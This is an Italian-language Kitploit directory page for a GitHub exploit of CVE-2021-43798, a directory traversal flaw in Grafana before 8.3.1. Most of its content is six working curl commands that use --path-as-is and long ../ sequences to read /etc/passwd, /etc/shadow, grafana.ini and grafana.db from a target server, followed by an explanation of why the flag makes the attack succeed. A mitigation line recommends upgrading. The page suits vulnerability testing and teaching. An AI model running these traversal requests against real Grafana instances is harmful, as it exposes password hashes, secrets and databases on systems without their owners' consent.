Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-43798 | Kitploit
Strumenti/GitHubGitHub/malekalthubiany/cve-2021-43798
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubmalekalthubiany/cve-2021-43798

CVE-2021-43798

Vedi Repository
2 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Exploit di Grafana CVE-2021-43798

Panoramica

Questo repository dimostra lo sfruttamento di CVE-2021-43798, una vulnerabilità di directory traversal in Grafana. Questa vulnerabilità consente agli attaccanti di leggere file arbitrari sul server.

Dettagli CVE

  • CVE: CVE-2021-43798
  • Descrizione: Vulnerabilità di directory traversal nelle versioni di Grafana precedenti alla 8.3.1.
  • Impatto: Consente ad attaccanti non autenticati di leggere file arbitrari sul server.

Prerequisiti

  • Una versione vulnerabile di Grafana in esecuzione (precedente alla 8.3.1)
  • Accesso all'istanza Grafana target

Sfruttamento

Utilizzo di curl

Per sfruttare la vulnerabilità manualmente, puoi utilizzare uno dei seguenti comandi curl per tentare di leggere file sensibili:

root@kitploit:~
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../Users/install.txt"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/passwd"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/grafana/grafana.ini"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../var/lib/grafana/grafana.db"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/hostname"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/shadow"

Perché --path-as-is?

Nel contesto dello sfruttamento della vulnerabilità di directory traversal CVE-2021-43798 di Grafana, l'opzione --path-as-is è essenziale perché consente di inviare direttamente al server, senza modifiche, le sequenze di traversal appositamente create (../../../../../). Questo può portare all'accesso a file sensibili sul server che si trovano al di fuori della directory prevista.

Senza --path-as-is, curl potrebbe normalizzare il percorso in qualcosa come /public/plugins/Users/install.txt, che non sfrutterebbe la vulnerabilità. Utilizzando --path-as-is, l'esatta sequenza di traversal viene preservata, consentendo all'exploit di avere successo.

Riferimento alla documentazione

Puoi trovare maggiori dettagli sull'opzione --path-as-is nella documentazione di curl. Comprendendo e utilizzando --path-as-is, i professionisti della sicurezza e i ricercatori possono dimostrare e testare efficacemente le vulnerabilità di directory traversal nelle applicazioni web.

Mitigazione

Per mitigare questa vulnerabilità, aggiorna Grafana alla versione 8.3.1 o successiva.

Scarica lo strumento